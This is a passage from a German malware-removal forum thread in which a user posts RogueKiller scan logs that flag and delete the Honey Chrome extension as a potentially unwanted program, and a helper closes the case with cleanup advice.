¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts-Datei ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Dateien ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Webbrowser ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> Chrome Addon
  [PUP.Gen0 (Potenziell bösartig)] Honey (C:\Users\samim\AppData\Local\Google\Chrome\User Data\Default\Extensions\BMNLCJ~1) -- bmnlcjabgnpnenekpadlanbbkooimhnj -> Gefunden

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Anti-Rootkit : 0 (Driver: Geladen) ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

Trotz der Annahme, dass das Extension sicher sein sollte habe ich das Extension gelöscht, da ich Chrome nicht mehr nutze:
Code:

RogueKiller Anti-Malware V14.7.3.0 (x64) [Sep 15 2020] (Free) von Adlice Software
Mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Betriebssystem : Windows 10 (10.0.18363) 64 bits
Gestartet in : Normaler Modus
Benutzer : samim [Administrator]
Gestartet von : C:\Program Files\RogueKiller\RogueKiller64.exe
Signaturen : 20201005_114100, Treiber : Geladen
Modus : Standard-Scan, Löschen -- Datum : 2020/10/06 12:40:07 (Dauer : 00:05:17)
Switches : -minimize

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Löschen ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Gen0 (Potenziell bösartig)] Honey -- bmnlcjabgnpnenekpadlanbbkooimhnj -> Gelöscht


cosinus 06.10.2020 11:58

Du kannst das gesamte Profil von Chrome löschen du nutzt es doch eh nicht mehr.


Dann wären wir durch! :daumenhoc

Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst...:dankeschoen:und/oder das Forum mit einer kleinen Spende http://www.trojaner-board.de/extra/spende.png unterstützen. :applaus:

Abschließend bitte noch einen Cleanup mit unserem TB-Cleanup-Script durchführen und unbedingt die Sicherheitsmaßnahmen lesen und umsetzen - beides ist in folgendem Lesestoff verlinkt:


Samoxx 06.10.2020 12:25

Vielen Dank, ich habe etwas im Forum hinterlassen.


Alle Zeitangaben in WEZ +1. Es ist jetzt 14:19 Uhr.

Copyright ©2000-2026, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55